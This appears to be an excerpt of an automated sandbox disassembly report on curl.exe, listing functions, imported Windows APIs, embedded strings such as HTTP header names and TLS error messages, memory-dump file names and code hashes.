free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000001,?,00000000,00000000,000000013F48F940), ref: 000000013F48F604

Part of subcall function 000000013F48EDEC: _time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000013F48F57E), ref: 000000013F48EE38

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: free$_time64
String ID:
API String ID: 3087401894-0
Opcode ID: 7b7bd352597241a04e53692e8d97cd6159b63f763517344c129eb2f6c5b7f5c7
Instruction ID: e08862772b2a5b23791c8fa62e6b3ee3319cd6080211a64a1b987d393b5b3401
Opcode Fuzzy Hash: 7b7bd352597241a04e53692e8d97cd6159b63f763517344c129eb2f6c5b7f5c7
Instruction Fuzzy Hash: DB21BF32A11BA085FB12DF52E414BEB6BA8F748BA4F4A4539DE4847752EF3AC547C340

Function 000000013F492B5C Relevance: 5.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,000000013F48B6E1), ref: 000000013F492BAB
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,000000013F48B6E1), ref: 000000013F492BC2
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000,000000013F48B6E1), ref: 000000013F492BE3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000000013F492BF4

Memory Dump Source

Source File: 00000007.00000002.387015676.000000013F481000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F480000, based on PE: true

Associated: 00000007.00000002.387012145.000000013F480000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387025982.000000013F4DE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387030367.000000013F4DF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387035964.000000013F4FF000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000007.00000002.387039733.000000013F500000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_13f480000_curl.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 6ff657cb843d304aaa61e28a697a6e84686e4a2c000e04354a40c192b77be9a1
Instruction ID: 1ac84bf1ad5364e9afd4dfc70e6e00b8dc0c665ed192d5ec0ee842facbc7219c
Opcode Fuzzy Hash: 6ff657cb843d304aaa61e28a697a6e84686e4a2c000e04354a40c192b77be9a1
Instruction Fuzzy Hash: 05115E32B11A44C6FB90DF55E1A43AE73B0F784B84F544639DB5A4B668DF39C662C304

Analysis Process: curl.exePID: 2432, Parent PID: 3616COMMON

Non-executed Functions

Function 000000013F322B14 Relevance: 40.5, APIs: 14, Strings: 9, Instructions: 245networkstringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F322BE4
strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F322C1B
inet_pton.WS2_32 ref: 000000013F322D0C
htons.WS2_32 ref: 000000013F322D1F
bind.WS2_32 ref: 000000013F322D49
inet_pton.WS2_32 ref: 000000013F322D71
htons.WS2_32 ref: 000000013F322D84
htons.WS2_32 ref: 000000013F322DBF
htons.WS2_32 ref: 000000013F322DEF
htons.WS2_32 ref: 000000013F322E30
bind.WS2_32 ref: 000000013F322E46
getsockname.WS2_32 ref: 000000013F322E72
WSAGetLastError.WS2_32 ref: 000000013F322E7C
WSAGetLastError.WS2_32 ref: 000000013F322EB2

Strings

bind failed with errno %d: %s, xrefs: 000000013F322ECB
Couldn't bind to '%s', xrefs: 000000013F322D9C
getsockname() failed with errno %d: %s, xrefs: 000000013F322E98
Name '%s' family %i resolved to '%s' family %i, xrefs: 000000013F322CB7
Bind to local port %hu failed, trying next, xrefs: 000000013F322E1A
Couldn't bind to interface '%s', xrefs: 000000013F322BF2
Local port: %hu, xrefs: 000000013F322ED8
host!, xrefs: 000000013F322C11
if!, xrefs: 000000013F322BDA

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: htons$ErrorLastbindinet_ptonstrncmp$getsockname
String ID: Bind to local port %hu failed, trying next$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$getsockname() failed with errno %d: %s$host!$if!
API String ID: 3536004664-1901189404
Opcode ID: 013b9911c718c5641d91d169b51c53b3d85e04f6a4959f12d9daef961f0da3cd
Instruction ID: d05a6d4f55fb31cf6b2e7a4b1d7c1368b9b0d535e7426cd89d101a1b8c642745
Opcode Fuzzy Hash: 013b9911c718c5641d91d169b51c53b3d85e04f6a4959f12d9daef961f0da3cd
Instruction Fuzzy Hash: B6B1DE7AA19690A1FB10DF65E8447EE67A4F788B84F40003AEE4A47B94DF7CC74AC710

Function 000000013F310658 Relevance: 28.4, APIs: 11, Strings: 5, Instructions: 395fileCOMMON

Download Yara Rule

APIs

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?,?,0000000A,?,000000013F30843C), ref: 000000013F3106AF
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?,?,0000000A,?,000000013F30843C), ref: 000000013F3106C0
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?,?,0000000A,?,000000013F30843C), ref: 000000013F310718
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?), ref: 000000013F3108A4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?), ref: 000000013F310A36
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,?), ref: 000000013F310B59

Strings

%s:%d: warning: '%s' %s, xrefs: 000000013F310B32
_curlrc, xrefs: 000000013F3106EF
<stdin>, xrefs: 000000013F310B0E
%s:%d: warning: '%s' uses unquoted whitespace in the line that may cause side-effects!, xrefs: 000000013F31098A
.curlrc, xrefs: 000000013F310691, 000000013F3106D7

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: freemalloc$__acrt_iob_funcfopen
String ID: %s:%d: warning: '%s' %s$%s:%d: warning: '%s' uses unquoted whitespace in the line that may cause side-effects!$.curlrc$<stdin>$_curlrc
API String ID: 2533209365-1529230327
Opcode ID: 41bbc969c998eaa1a6a2ab3b034595165a186059a2c17a1db967d8fbf99a17b5
Instruction ID: 2fd2bd29ff5b19165aa97a23e06483d0936efe24db9d6e3a4dd20bd0bd47d459
Opcode Fuzzy Hash: 41bbc969c998eaa1a6a2ab3b034595165a186059a2c17a1db967d8fbf99a17b5
Instruction Fuzzy Hash: 5CF1F5B2A0578485FB65AF3694A03EC2BB1B705B98F48513DDE8A177E5DB39C64BC300

Function 000000013F319B60 Relevance: 17.9, APIs: 5, Strings: 5, Instructions: 447COMMON

Download Yara Rule

Strings

file, xrefs: 000000013F319C5B
file://%s%s%s, xrefs: 000000013F319C91
%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s, xrefs: 000000013F31A039
https, xrefs: 000000013F319CD0
%%25%s], xrefs: 000000013F319DD2

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID:
String ID: %%25%s]$%s://%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$file$file://%s%s%s$https
API String ID: 0-1669851433
Opcode ID: 55ad73ff8bd182c5e7edf142535e21b4b3863f18256ac5d8263d90e22a4e6501
Instruction ID: a2303e31c47d1a71cfefcfbb17b61e13a7f537c35b6d04c9fbc4cfea3d34b930
Opcode Fuzzy Hash: 55ad73ff8bd182c5e7edf142535e21b4b3863f18256ac5d8263d90e22a4e6501
Instruction Fuzzy Hash: 3D129F32A06B8585FE65AF25E9403EA77B0F745B95F14803ADE8E07794EB39CA47C300

Function 000000013F317BAC Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 414stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F317FBD
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F317FC6
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F317FDF
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F317FE7
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F317FF2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F317FFD

Strings

%02d:%02d:%02d%n, xrefs: 000000013F317F62
%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz], xrefs: 000000013F317DCD
GMT, xrefs: 000000013F317E9F
%02d:%02d%n, xrefs: 000000013F317F98

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: _errno$strtol
String ID: %02d:%02d%n$%02d:%02d:%02d%n$%31[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz]$GMT
API String ID: 3596500743-988243589
Opcode ID: a61c42e7b25da293dd4288a588b2f0515b78c60a16bd8d9941b6d6054f0bc75c
Instruction ID: dba4eab62da51e0f9c819763efb0808a7f18e9e920cc9ccfeb0908c0da69ec4a
Opcode Fuzzy Hash: a61c42e7b25da293dd4288a588b2f0515b78c60a16bd8d9941b6d6054f0bc75c
Instruction Fuzzy Hash: 49F1CE72F00A058AFB24DB78D8043ED77B2B7957A8F54423ADE2A577D4E7388A46C740

Function 000000013F33CBDC Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 407COMMON

Download Yara Rule

Strings

Digest, xrefs: 000000013F33CBE8
WDigest, xrefs: 000000013F33CC4E, 000000013F33CFCF
SSPI: couldn't get auth info, xrefs: 000000013F33CC6F
digest_sspi: MakeSignature failed, error 0x%08lx, xrefs: 000000013F33CED8
schannel: InitializeSecurityContext failed: %s, xrefs: 000000013F33D1D3

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID:
String ID: Digest$SSPI: couldn't get auth info$WDigest$digest_sspi: MakeSignature failed, error 0x%08lx$schannel: InitializeSecurityContext failed: %s
API String ID: 0-2436749399
Opcode ID: 2a5a99bfd0a92872fb976d69f0cbad93f89190c7f32708fac90c229b458bbe87
Instruction ID: 29ea34f26fbbd0b4932d5e23a59088f4e95d46638d0f39c198faa997c739a697
Opcode Fuzzy Hash: 2a5a99bfd0a92872fb976d69f0cbad93f89190c7f32708fac90c229b458bbe87
Instruction Fuzzy Hash: 3D12F336B01B44CAEB54DF65E8543E937A0F788B88F10452AEE4E47B68DF38D65AC740

Function 000000013F310F28 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 301COMMON

Download Yara Rule

APIs

fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F310FCB

Strings

%3I64d, xrefs: 000000013F311122, 000000013F311164
DL% UL% Dled Uled Xfers Live Qd Total Current Left Speed, xrefs: 000000013F310FBD
%-3s %-3s %s %s %5I64d %5I64d %5I64d %s %s %s %s %5s, xrefs: 000000013F311367

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: fputs
String ID: %-3s %-3s %s %s %5I64d %5I64d %5I64d %s %s %s %s %5s$%3I64d$DL% UL% Dled Uled Xfers Live Qd Total Current Left Speed
API String ID: 1795875747-3331718919
Opcode ID: f60f63ab4fd1dd1aa093c2fe40b6a0adc895ad17f63c63c3a3d8c5104ab10c16
Instruction ID: 0025ebbd73630678775ecc736d81d4fa5baf1f89d6679351983a0744f8f2a26d
Opcode Fuzzy Hash: f60f63ab4fd1dd1aa093c2fe40b6a0adc895ad17f63c63c3a3d8c5104ab10c16
Instruction Fuzzy Hash: 18D1CF72F05B808AEB05EBB5E8403DD77B5B755788F04423ADD4957BA9DE38C25AC340

Function 000000013F301AB0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 111COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 000000013F301AFE
fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F301BD9

Strings

%*s, xrefs: 000000013F301AE9
-=O=-, xrefs: 000000013F301B0A
#, xrefs: 000000013F301BCF

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: __swprintf_lfputs
String ID: #$%*s$-=O=-
API String ID: 2972761690-742414071
Opcode ID: e0f3c137f3f633e4654859a412c2d647b3a759afbe71d52922b3f3b1b0653e4d
Instruction ID: 326e7bde8ae23eca6e548bf42d88cea11c75c03f8a78757c9b591c095b36228f
Opcode Fuzzy Hash: e0f3c137f3f633e4654859a412c2d647b3a759afbe71d52922b3f3b1b0653e4d
Instruction Fuzzy Hash: F9411A327251809BE7DCCB39E99579977A1F388744F505239DB4A83FA8DB38E625CB00

Function 000000013F359BD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32 ref: 000000013F359BEC
CryptCreateHash.ADVAPI32 ref: 000000013F359C0D

Strings

@, xrefs: 000000013F359BDC

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: Crypt$AcquireContextCreateHash
String ID: @
API String ID: 1914063823-2766056989
Opcode ID: f28ce8f2b2c7489b8206fc3d31480ca9e750317407cdf0dae748bc20fa13d9e8
Instruction ID: e87ec324e87e1f74d7da5924d392ea9e74991ba0c3a5b4044fdc7fb6fd1cb3f5
Opcode Fuzzy Hash: f28ce8f2b2c7489b8206fc3d31480ca9e750317407cdf0dae748bc20fa13d9e8
Instruction Fuzzy Hash: AAE04875B21591C3F7704B71E805F466390F7C8754F4441248A4C4BA54DF3CC28ACB58

Function 000000013F33AA98 Relevance: 56.5, APIs: 3, Strings: 29, Instructions: 459stringCOMMON

Download Yara Rule

APIs

Part of subcall function 000000013F313884: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,000000013F305A63), ref: 000000013F31389D

_time64.API-MS-WIN-CRT-TIME-L1-1-0(?,?,00000002,?,00000000,?,?,000000013F33B6DB,?,?,?,?,?,?,00000000,?), ref: 000000013F33AE05
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000002,?,00000000,?,?,000000013F33B6DB,?,?,?,?,?,?,00000000,?), ref: 000000013F33AF43
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000002,?,00000000,?,?,000000013F33B6DB,?,?,?,?,?,?,00000000,?), ref: 000000013F33AF56

Strings

false, xrefs: 000000013F33B0E0
Location:, xrefs: 000000013F33B146
Strict-Transport-Security:, xrefs: 000000013F33B1D3
Maximum file size exceeded, xrefs: 000000013F33AB4B
Content-Length:, xrefs: 000000013F33AADE
Content-Range:, xrefs: 000000013F33AE2C
close, xrefs: 000000013F33AC5C, 000000013F33ACDF
Last-Modified:, xrefs: 000000013F33AFBB
Connection:, xrefs: 000000013F33ACB2, 000000013F33ACEE
HTTP/1.1 proxy connection set close, xrefs: 000000013F33AC8E
127.0.0.1, xrefs: 000000013F33AF39
Invalid Content-Length: value, xrefs: 000000013F33AB7A
Content-Encoding:, xrefs: 000000013F33AD81
HTTP/1.0 connection set to keep alive, xrefs: 000000013F33ACD3
localhost, xrefs: 000000013F33AF29
keep-alive, xrefs: 000000013F33AC05, 000000013F33ACA3
Proxy-Connection:, xrefs: 000000013F33AC14, 000000013F33AC6B
Set-Cookie:, xrefs: 000000013F33AEEC
[::1], xrefs: 000000013F33AF4C
Negotiate: noauthpersist -> %d, header part: %s, xrefs: 000000013F33B0FB
HTTP/1.0 proxy connection set to keep alive, xrefs: 000000013F33AC35
Content-Type:, xrefs: 000000013F33AB96
Overflow Content-Length: value, xrefs: 000000013F33AB6E
WWW-Authenticate:, xrefs: 000000013F33B00C
Persistent-Auth:, xrefs: 000000013F33B0A6
Proxy-authenticate:, xrefs: 000000013F33B03B
Transfer-Encoding:, xrefs: 000000013F33AD29
Illegal STS header skipped, xrefs: 000000013F33B211
Retry-After:, xrefs: 000000013F33ADBF

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: strcmp$_errno_time64
String ID: 127.0.0.1$Connection:$Content-Encoding:$Content-Length:$Content-Range:$Content-Type:$HTTP/1.0 connection set to keep alive$HTTP/1.0 proxy connection set to keep alive$HTTP/1.1 proxy connection set close$Illegal STS header skipped$Invalid Content-Length: value$Last-Modified:$Location:$Maximum file size exceeded$Negotiate: noauthpersist -> %d, header part: %s$Overflow Content-Length: value$Persistent-Auth:$Proxy-Connection:$Proxy-authenticate:$Retry-After:$Set-Cookie:$Strict-Transport-Security:$Transfer-Encoding:$WWW-Authenticate:$[::1]$close$false$keep-alive$localhost
API String ID: 1495474129-986724021
Opcode ID: b6d775b19366e5986245cc4d14d398c8371116df75f98b61ca64932071004797
Instruction ID: a9d7c40193bae6227ad009a2e96effa87f2d51189159e1191c088a710b096b1f
Opcode Fuzzy Hash: b6d775b19366e5986245cc4d14d398c8371116df75f98b61ca64932071004797
Instruction Fuzzy Hash: 6A22BC3AB0468096FF68EB2299503E827A1F745BC4F44413EDE5A4BB96DB38C75BC701

Function 000000013F31EB80 Relevance: 43.9, APIs: 10, Strings: 15, Instructions: 129stringCOMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31EBAC
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31EBB4
__swprintf_l.LIBCMT ref: 000000013F31EFE0
__swprintf_l.LIBCMT ref: 000000013F31F021
__swprintf_l.LIBCMT ref: 000000013F31F060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013F31F06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F31F087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000000013F31F09C

Strings

%s - %s, xrefs: 000000013F31F059
SEC_I_COMPLETE_AND_CONTINUE, xrefs: 000000013F31EF79
SEC_I_CONTINUE_NEEDED, xrefs: 000000013F31EF8E
SEC_I_COMPLETE_NEEDED, xrefs: 000000013F31EF85
Unknown error, xrefs: 000000013F31EFC2
SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 000000013F31EFD6
SEC_I_NO_LSA_CONTEXT, xrefs: 000000013F31EFF3
SEC_I_LOCAL_LOGON, xrefs: 000000013F31EF6D
SEC_I_INCOMPLETE_CREDENTIALS, xrefs: 000000013F31F005
SEC_I_SIGNATURE_NEEDED, xrefs: 000000013F31EFEA
SEC_I_RENEGOTIATE, xrefs: 000000013F31EFFC
No error, xrefs: 000000013F31EF97
SEC_I_CONTEXT_EXPIRED, xrefs: 000000013F31EFA0
CRYPT_E_REVOKED, xrefs: 000000013F31EF39
%s (0x%08X), xrefs: 000000013F31F00C

Memory Dump Source

Source File: 00000016.00000002.523189145.000000013F301000.00000020.00000001.01000000.00000004.sdmp, Offset: 000000013F300000, based on PE: true

Associated: 00000016.00000002.523186674.000000013F300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523217870.000000013F35E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523222110.000000013F35F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523232280.000000013F37F000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000016.00000002.523236092.000000013F380000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_13f300000_curl.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$strncpy
String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
API String ID: 3653662010-131313631
Opcode ID: 9ef97734a369c9a12d841699bddcdcdf3d3b1b9dc4d8d4440ba5245ec52dcd0e
Instruction ID: 7232f0fc7854786f96e52ab7fb04fb907a68e1168d72b224cc0422ace2e52e6e
Opcode Fuzzy Hash: 9ef97734a369c9a12d841699bddcdcdf3d3b1b9dc4d8d4440ba5245ec52dcd0e
Instruction Fuzzy Hash: 45516C32905A44D2F768EF24A418BE96370B784780F85413EE94A826A5DB3DDB8BC340

Function 000000013F312310 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 279stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F3123AB
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 000000013F3123BF
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000000013F3123C8
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,00000000,00000000,?,00000000,?,000000013F312979), ref: 000000013F312506
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?,000000013F312979), ref: 000000013F31251B
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,000000013F312979), ref: 000000013F312524
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,000000013F312979), ref: 000000013F312587
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?,000000013F312979), ref: 000000013F31259C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,000000013F312979), ref: 000000013F3125A5
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,000000013F312979), ref: 000000013F3125BC
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?,000000013F312979), ref: 000000013F3125D1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,000000013F312979), ref: 000000013F3125DA

Part of subcall function 000000013F303E4C: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 000000013F303E89

Strings

%c-%c%c, xrefs: 000000013F31238F
bad range specification, xrefs: 000000013F3126AF
range overflow, xrefs: 000000013F3124A2, 000000013F312692
bad range, xrefs: 000000013F312431

Memory Dump Source

